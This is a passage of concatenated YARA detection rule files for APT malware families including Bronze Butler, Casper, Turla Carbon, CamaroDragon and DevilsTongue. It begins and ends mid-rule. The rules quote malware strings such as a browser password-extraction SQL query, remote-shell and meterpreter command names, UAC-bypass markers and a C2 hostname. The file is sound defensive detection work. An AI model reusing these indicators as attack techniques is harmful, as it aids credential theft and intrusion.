modified = "2023-01-06"
super_rule = 1
score = 80
hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
id = "c3d712ae-3f8e-578c-81cd-fd3e48213875"
strings:
$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii
$s2 = "\\Mozilla\\Firefox\\Profiles\\" ascii
$s4 = "\\auto.cfg" ascii
$s5 = "/ncsi.txt" fullword ascii
$s6 = "/en-us/default.aspx" fullword ascii
$s7 = "cmd /c" fullword ascii
$s9 = "APPDATA" fullword ascii /* Goodware String - occured 25 times */
condition:
uint16(0) == 0x5a4d and filesize < 850KB and
(
( $x1 and 1 of ($s*) ) or
( 4 of ($s*) )
)
}
rule Emdivi_Gen4 {
meta:
description = "Detects Emdivi Malware"
author = "Florian Roth (Nextron Systems) @Cyber0ps"
reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
date = "2015-08-20"
super_rule = 1
score = 80
hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
id = "02629873-a797-51ff-83fc-af499cafa1e8"
strings:
$s1 = ".http_port\", " fullword wide
$s2 = "UserAgent: " fullword ascii
$s3 = "AUTH FAILED" fullword ascii
$s4 = "INVALID FILE PATH" fullword ascii
$s5 = ".autoconfig_url\", \"" fullword wide
$s6 = "FAILED TO WRITE FILE" fullword ascii
$s7 = ".proxy" fullword wide
$s8 = "AuthType: " fullword ascii
$s9 = ".no_proxies_on\", \"" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 853KB and all of them
}

View file

@ -0,0 +1,197 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-10-14
Identifier: Bronze Butler
Reference: https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule BronzeButler_Daserf_Delphi_1 {
meta:
description = "Detects malware / hacktool sample from Bronze Butler incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
date = "2017-10-14"
hash1 = "89a80ca92600af64eb9c32cab4e936c7d675cf815424d72438973e2d6788ef64"
hash2 = "b1bd03cd12638f44d9ace271f65645e7f9b707f86e9bcf790e0e5a96b755556b"
hash3 = "22e1965154bdb91dd281f0e86c8be96bf1f9a1e5fe93c60a1d30b79c0c0f0d43"
id = "88372e62-3bba-58dc-825c-f35533e42825"
strings:
$s1 = "Services.exe" fullword ascii
$s2 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
$s3 = "l32.dll" fullword ascii
$s4 = "tProcess:" fullword ascii
$s5 = " InjectPr" ascii
$s6 = "Write$Error creating variant or safe array\x1fInvalid argument to time encode" fullword wide
$s7 = "on\\run /v " fullword ascii
$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
$s9 = "ms1ng2d3d2.exe" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them )
}
rule BronzeButler_Daserf_C_1 {
meta:
description = "Detects malware / hacktool sample from Bronze Butler incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
date = "2017-10-14"
hash1 = "a4afd9df1b4cc014c3a89d7b4a560fa3e368b02286c42841762714b23e68cc05"
hash2 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
hash3 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
hash4 = "b1fdc6dc330e78a66757b77cc67a0e9931b777cd7af9f839911eecb74c04420a"
hash5 = "15abe7b1355cd35375de6dde57608f6d3481755fdc9e71d2bfc7c7288db4cd92"
hash6 = "85544d2bcaf8e6ca32bbc0a9e9583c9db1dce837043f555a7ff66363d5858439"
hash7 = "2dc24622c1e91642a21a64c0dd31cbe953e8f77bd3d6abcf2c4676c3b11bb162"
hash8 = "2bdb88fa24cffba240b60416835189c76a9920b6c3f6e09c3c4b171c2f57031c"
id = "62a5cc4a-7c58-5e4d-ac23-8d1f850a540a"
strings:
$s1 = "(c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com." fullword ascii
$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)" fullword ascii
$a1 = "ndkkwqgcm" fullword ascii
$a2 = "RtlGetCo" fullword ascii
$a3 = "hutils" fullword ascii
$b1 = "%USERPROFILE%\\System" fullword ascii
$b2 = "msid.dat" fullword ascii
$b3 = "DRIVE_REMOTE" fullword wide
$b4 = "%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
$b5 = "jcbhe.asp" fullword ascii
$b6 = "edset.asp" fullword ascii
$b7 = "bxcve.asp" fullword ascii
$b8 = "hcvery.php" fullword ascii
$b9 = "ynhkef.php" fullword ascii
$b10 = "dkgwey.php" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 300KB and (
pe.imphash() == "088382f4887e3b2c4bd5157f2d72b618" or
all of ($a*) or
4 of them
)
}
rule BronzeButler_DGet_1 {
meta:
description = "Detects malware / hacktool sample from Bronze Butler incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
date = "2017-10-14"
hash1 = "bd81521445639aaa5e3bcb5ece94f73feda3a91880a34a01f92639f8640251d6"
id = "d60fcc9f-0f17-5871-9e8e-71d26e2f46bc"
strings:
$s2 = "DGet Tool Made by XZ" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 10KB and 1 of them )
}
rule BronzeButler_UACBypass_1 {
meta:
description = "Detects malware / hacktool sample from Bronze Butler incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
date = "2017-10-14"
hash1 = "fe06b99a0287e2b2d9f7faffbda3a4b328ecc05eab56a3e730cfc99de803b192"
id = "01853352-58fc-56a3-8c20-08405c71e251"
strings:
$x1 = "\\Release\\BypassUacDll.pdb" ascii
$x2 = "%programfiles%internet exploreriexplore.exe" fullword wide
$x3 = "Elevation:Administrator!new:{3ad055" fullword wide
$x4 = "BypassUac.pdb" fullword ascii
$x5 = "[bypassUAC] started X64" fullword wide
$x6 = "[bypassUAC] started X86" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them )
}
rule BronzeButler_xxmm_1 {
meta:
description = "Detects malware / hacktool sample from Bronze Butler incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
date = "2017-10-14"
hash1 = "7197de18bc5a4c854334ff979f3e4dafa16f43d7bf91edfe46f03e6cc88f7b73"
id = "0e413e3a-fb61-58bc-9ecb-4ef76e83a7f3"
strings:
$x1 = "\\Release\\ReflectivLoader.pdb" ascii
$x3 = "\\Projects\\xxmm2\\Release\\" ascii
$x5 = "http://127.0.0.1/phptunnel.php" fullword ascii
$s1 = "xxmm2.exe" fullword ascii
$s2 = "\\AvUpdate.exe" wide
$s3 = "stdapi_fs_file_download" fullword ascii
$s4 = "stdapi_syncshell_open" fullword ascii
$s5 = "stdapi_execute_sleep" fullword ascii
$s6 = "stdapi_syncshell_kill" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 700KB and (
1 of ($x*) or
4 of them
)
}
rule BronzeButler_RarStar_1 {
meta:
description = "Detects malware / hacktool sample from Bronze Butler incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
date = "2017-10-14"
hash1 = "0fc1b4fdf0dc5373f98de8817da9380479606f775f5aa0b9b0e1a78d4b49e5f4"
id = "770270b3-6743-5efb-84d8-b63f1df800d9"
strings:
$s1 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.0;+SV1)" fullword wide
$s2 = "http://www.google.co.jp" fullword wide
$s3 = "16D73E22-873D-D58E-4F42-E6055BC9825E" fullword ascii
$s4 = "\\*.rar" ascii
condition:
( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them )
}
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-11-08
Identifier: Bronze Butler
Reference: https://goo.gl/ffeCfd
*/
/* Rule Set ----------------------------------------------------------------- */
rule Daserf_Nov1_BronzeButler {
meta:
description = "Detects Daserf malware used by Bronze Butler"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/ffeCfd"
date = "2017-11-08"
hash1 = "5ede6f93f26ccd6de2f93c9bd0f834279df5f5cfe3457915fae24a3aec46961b"
id = "58c4d3dc-c516-567b-8746-4e185c3cd328"
strings:
$x1 = "mstmp1845234.exe" fullword ascii
/* Bronce Butler UA String - see google search */
$x2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)" fullword ascii
$x3 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
$s1 = "Content-Type: */*" fullword ascii
$s2 = "ProxyEnable" ascii fullword
$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" ascii fullword
$s4 = "iexplore.exe" ascii fullword
/* Looks random but present in many samples */
$s5 = "\\SOFTWARE\\Microsoft\\Windows\\Cu" ascii
$s6 = "rrentVersion\\Internet Settings" fullword ascii
$s7 = "ws\\CurrentVersion\\Inter" fullword ascii
$s8 = "Documents an" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 700KB and ( 1 of ($x*) or 5 of them )
}

View file

@ -0,0 +1,76 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-09-05
Identifier: Buckeye
*/
/* Rule Set ----------------------------------------------------------------- */
rule Buckeye_Osinfo {
meta:
description = "Detects OSinfo tool used by the Buckeye APT group"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
date = "2016-09-05"
id = "e40a86d1-fd1a-5430-b7b7-8cc7ca128cc5"
strings:
$s1 = "-s ShareInfo ShareDir" fullword ascii
$s2 = "-a Local And Global Group User Info" fullword ascii
$s3 = "-f <infile> //input server list from infile, OneServerOneLine" fullword ascii
$s4 = "info <\\server> <user>" fullword ascii
$s5 = "-c Connect Test" fullword ascii
$s6 = "-gd Group Domain Admins" fullword ascii
$s7 = "-n NetuseInfo" fullword ascii
condition:
uint16(0) == 0x5a4d and 3 of ($s*)
}
rule RemoteCmd {
meta:
description = "Detects a remote access tool used by APT groups - file RemoteCmd.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/igxLyF"
date = "2016-09-08"
modified = "2022-12-21"
hash1 = "5264d1de687432f8346617ac88ffcb31e025e43fc3da1dad55882b17b44f1f8b"
id = "384f37f3-4562-5d79-9793-0384c43d4602"
strings:
$s1 = "RemoteCmd.exe" fullword wide
$s2 = "\\Release\\RemoteCmd.pdb" ascii
$s3 = "RemoteCmd [ComputerName] [Executable] [Param1] [Param2] ..." fullword wide
$s4 = "http://{0}:65101/CommandEngine" fullword wide
$s5 = "Brenner.RemoteCmd.Client" fullword ascii
$s6 = "$b1888995-1ee5-4f6d-82df-d2ab8ae73d63" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 50KB and 2 of them ) or ( 4 of them )
}
rule ChromePass {
meta:
description = "Detects a tool used by APT groups - file ChromePass.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/igxLyF"
date = "2016-09-08"
modified = "2022-12-21"
hash1 = "5ff43049ae18d03dcc74f2be4a870c7056f6cfb5eb636734cca225140029de9a"
id = "950b9761-bdfd-514b-90ea-a1454d35ce5a"
strings:
$x1 = "\\Release\\ChromePass.pdb" ascii
$x2 = "Windows Protect folder for getting the encryption keys" wide
$x3 = "Chrome User Data folder where the password file is stored" wide
$s1 = "Opera Software\\Opera Stable\\Login Data" fullword wide
$s2 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword wide
$s3 = "Load the passwords from another Windows user or external drive: " fullword wide
$s4 = "Chrome Passwords List!Select the windows profile folder" fullword wide
$s5 = "Load the passwords of the current logged-on user" fullword wide
$s6 = "Windows Login Password:" fullword wide
$s7 = "SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created fr" ascii
$s8 = "Chrome Password Recovery" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 700KB and 1 of ($x*) ) or ( 5 of them )
}

View file

@ -0,0 +1,56 @@
rule MAL_LNX_CamaroDragon_Sheel_Oct23 {
meta:
description = "Detects CamaroDragon's tool named sheel"
author = "Florian Roth"
reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
date = "2023-10-06"
score = 85
hash1 = "7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a"
id = "f6f08c0e-236c-5194-9369-da8fdef4aa21"
strings:
$x1 = "-h server_ip -p server_port -i update_index[0-4] [-r]" ascii fullword
$s1 = "read_ip" ascii fullword
$s2 = "open fail.%m" ascii fullword
$s3 = "ri:h:p:" ascii fullword /* flags */
$s4 = "update server list success!" ascii fullword
condition:
uint16(0) == 0x457f and
filesize < 30KB and (
1 of ($x*)
or 3 of them
)
or 4 of them
}
rule MAL_LNX_CamaroDragon_HorseShell_Oct23 {
meta:
description = "Detects CamaroDragon's HorseShell implant for routers"
author = "Florian Roth"
reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
date = "2023-10-06"
score = 85
hash1 = "998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c"
id = "9e54745f-146f-50a6-b30f-53aaaa6907b5"
strings:
$x1 = "echo \"start shell '%s' failed!\" > .remote_shell.log" ascii fullword
$x2 = "*****recv NET_REQ_HORSE_SHELL REQ_CONNECT_PORT*****" ascii fullword
$s1 = "m.cremessage.com" ascii fullword
$s2 = "POST http://%s/index.php HTTP/1.1" ascii fullword
$s3 = "wzsw_encrypt_buf" ascii fullword
$s4 = "body:%d-%s" ascii fullword
$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident" ascii fullword /* String occurs 1 times in goodware */
$s6 = "process_http_read_events" ascii fullword
$op1 = { c4 34 42 00 02 30 63 00 40 10 60 00 09 ae 62 00 48 8e 62 00 cc }
$op2 = { 27 f4 8c 46 27 f0 03 20 f8 09 00 60 28 21 }
condition:
uint16(0) == 0x457f and
filesize < 600KB and (
1 of ($x*)
or 3 of them
)
or 5 of them
}

View file

@ -0,0 +1,47 @@
import "pe"
rule MAL_DevilsTongue_HijackDll {
meta:
description = "Detects SOURGUM's DevilsTongue hijack DLL"
author = "Microsoft Threat Intelligence Center (MSTIC)"
date = "2021-07-15"
reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/"
score = 80
id = "390b8b73-6740-513d-8c70-c9002be0ce69"
strings:
$str1 = "windows.old\\windows" wide
$str2 = "NtQueryInformationThread"
$str3 = "dbgHelp.dll" wide
$str4 = "StackWalk64"
$str5 = "ConvertSidToStringSidW"
$str6 = "S-1-5-18" wide
$str7 = "SMNew.dll" // DLL original name
// Call check in stack manipulation
// B8 FF 15 00 00 mov eax, 15FFh
// 66 39 41 FA cmp [rcx-6], ax
// 74 06 jz short loc_1800042B9
// 80 79 FB E8 cmp byte ptr [rcx-5], 0E8h ;
$code1 = { B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8 }
// PRNG to generate number of times to sleep 1s before exiting
// 44 8B C0 mov r8d, eax
// B8 B5 81 4E 1B mov eax, 1B4E81B5h
// 41 F7 E8 imul r8d
// C1 FA 05 sar edx, 5
// 8B CA mov ecx, edx
// C1 E9 1F shr ecx, 1Fh
// 03 D1 add edx, ecx
// 69 CA 2C 01 00 00 imul ecx, edx, 12Ch
// 44 2B C1 sub r8d, ecx
// 45 85 C0 test r8d, r8d
// 7E 19 jle short loc_1800014D0
$code2 = { 44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19 }
condition:
filesize < 800KB and
uint16(0) == 0x5A4D and
( pe.characteristics & pe.DLL ) and
(
4 of them or
( $code1 and $code2 ) or
pe.imphash() == "9a964e810949704ff7b4a393d9adda60"
)
}

View file

@ -0,0 +1,71 @@
// For feedback or questions contact us at: github@eset.com
// https://github.com/eset/malware-ioc/
//
// These yara rules are provided to the community under the two-clause BSD
// license as follows:
//
// Copyright (c) 2017, ESET
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// 1. Redistributions of source code must retain the above copyright notice, this
// list of conditions and the following disclaimer.
//
// 2. Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
import "pe"
rule generic_carbon
{
meta:
author = "ESET Research"
date = "2017-03-30"
description = "Turla Carbon malware"
reference = "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
source = "https://github.com/eset/malware-ioc/"
contact = "github@eset.com"
license = "BSD 2-Clause"
id = "efdc0d16-a974-5c00-a401-391d60f3081e"
strings:
$s1 = "ModStart"
$t1 = "STOP|OK"
$t2 = "STOP|KILL"
condition:
(uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}
rule carbon_metadata
{
meta:
author = "ESET Research"
date = "2017-03-30"
description = "Turla Carbon malware"
reference = "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/"
source = "https://github.com/eset/malware-ioc/"
contact = "github@eset.com"
license = "BSD 2-Clause"
id = "976b6a7d-00bf-5d0f-baf9-84fc5dbd21a2"
condition:
(pe.version_info["InternalName"] contains "SERVICE.EXE" or
pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or
pe.version_info["InternalName"] contains "MSXIML.DLL")
and pe.version_info["CompanyName"] contains "Microsoft Corporation"
}

104
yara-Neo23x0/apt_casper.yar Normal file
View file

@ -0,0 +1,104 @@
/* State-sponsored Casper Malware Rules by @4nc4p - attribution and analysis by @pinkflawd @r00tbsd @circl_lu */
rule Casper_Backdoor_x86 {
meta:
description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015-03-05"
modified = "2023-01-27"
hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
score = 80
id = "9e54f00c-74a7-56cc-87e5-8dec1233cbb5"
strings:
$s1 = "\"svchost.exe\"" fullword wide
$s2 = "firefox.exe" fullword ascii
$s3 = "\"Host Process for Windows Services\"" fullword wide
$x1 = "\\Users\\*" ascii
$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" ascii
$x3 = "\\Mozilla\\Firefox\\Profiles\\*" ascii
$x4 = "\\Documents and Settings\\*" ascii
$y1 = "%s; %S=%S" fullword wide
$y2 = "%s; %s=%s" fullword ascii
$y3 = "Cookie: %s=%s" fullword ascii
$y4 = "http://%S:%d" fullword wide
$z1 = "http://google.com/" ascii
$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
$z3 = "Operating System\"" fullword wide
condition:
( filesize < 250KB and all of ($s*) ) or
( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) )
}
rule Casper_EXE_Dropper {
meta:
description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015/03/05"
hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
score = 80
id = "a901d045-6f9b-57e8-8347-6f78178b7231"
strings:
$s0 = "<Command>" fullword ascii
$s1 = "</Command>" fullword ascii
$s2 = "\" /d \"" fullword ascii
$s4 = "'%s' %s" fullword ascii
$s5 = "nKERNEL32.DLL" fullword wide
$s6 = "@ReturnValue" fullword wide
$s7 = "ID: 0x%x" fullword ascii
$s8 = "Name: %S" fullword ascii
condition:
7 of them
}
rule Casper_Included_Strings {
meta:
description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015/03/06"
score = 50
id = "34ba474d-0858-534a-8f32-db5a709e8814"
strings:
$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
$a1 = "& SYSTEMINFO) ELSE EXIT"
$c1 = "domcommon.exe" wide fullword // File Name
$c2 = "jpic.gov.sy" fullword // C2 Server
$c3 = "aiomgr.exe" wide fullword // File Name
$c4 = "perfaudio.dat" fullword // Temp File Name
$c5 = "Casper_DLL.dll" fullword // Name
$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } // Decryption Key
$c7 = "{4216567A-4512-9825-7745F856}" fullword // Mutex
condition:
all of ($a*) or
uint16(0) == 0x5a4d and ( 1 of ($c*) )
}
rule Casper_SystemInformation_Output {
meta:
description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015/03/06"
score = 70
id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
strings:
$a0 = "***** SYSTEM INFORMATION ******"
$a1 = "***** SECURITY INFORMATION ******"
$a2 = "Antivirus: "
$a3 = "Firewall: "
$a4 = "***** EXECUTION CONTEXT ******"
$a5 = "Identity: "
$a6 = "<CONFIG TIMESTAMP="
condition:
all of them
}

View file

@ -0,0 +1,108 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2015-08-08
Identifier: Cheshire Cat
Version: 0.1
*/
/* Rule Set ----------------------------------------------------------------- */
rule CheshireCat_Sample2 {
meta:
description = "Auto-generated rule"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
date = "2015-08-08"
score = 70
hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
id = "14448138-0af3-5669-8aa3-f9e773e2a008"
strings:
$s0 = "mpgvwr32.dll" fullword ascii
$s1 = "Unexpected failure of wait! (%d)" fullword ascii
$s2 = "\"%s\" /e%d /p%s" fullword ascii
$s4 = "error in params!" fullword ascii
$s5 = "sscanf" fullword ascii
$s6 = "<>Param : 0x%x" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 4 of ($s*)
}
/* Generic Rules ----------------------------------------------------------- */
/* Gen1 is more exact than Gen2 - until now I had no FPs with Gen2 */
rule CheshireCat_Gen1 {
meta:
description = "Auto-generated rule"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
date = "2015-08-08"
super_rule = 1
score = 90
hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
id = "2068feed-2101-5b12-9e36-db7b0f5cc4ec"
strings:
$x1 = "CAPESPN.DLL" fullword wide
$x2 = "WINF.DLL" fullword wide
$x3 = "NCFG.DLL" fullword wide
$x4 = "msgrthlp.dll" fullword wide
$x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii
$x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii
$a1 = "Interface\\%s\\info" fullword ascii
$a2 = "Interface\\%s\\info\\%s" fullword ascii
$a3 = "CLSID\\%s\\info\\%s" fullword ascii
$a4 = "CLSID\\%s\\info" fullword ascii
$b1 = "Windows Shell Icon Handler" fullword wide
$b2 = "Microsoft Shell Icon Handler" fullword wide
$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
$s5 = "%sMutex" fullword ascii
$s6 = "\\ShellIconCache" ascii
$s7 = "+6Service Pack " fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 350KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*) and 1 of ($x*)
}
rule CheshireCat_Gen2 {
meta:
description = "Cheshire Cat Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
date = "2015-08-08"
super_rule = 1
score = 70
hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
id = "b97b20bd-f6b9-512f-ba99-6c38ba7853be"
strings:
$a1 = "Interface\\%s\\info" fullword ascii
$a2 = "Interface\\%s\\info\\%s" fullword ascii
$a3 = "CLSID\\%s\\info\\%s" fullword ascii
$a4 = "CLSID\\%s\\info" fullword ascii
$b1 = "Windows Shell Icon Handler" fullword wide
$b2 = "Microsoft Shell Icon Handler" fullword wide
$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
$s5 = "%sMutex" fullword ascii
$s6 = "\\ShellIconCache" ascii
$s7 = "+6Service Pack " fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*)
}

View file

@ -0,0 +1,16 @@
rule Line_Dancer {
meta:
author = "NCSC"
description = "Targets code sections of Line Dancer, a shellcode loader targeting Cisco ASA devices."
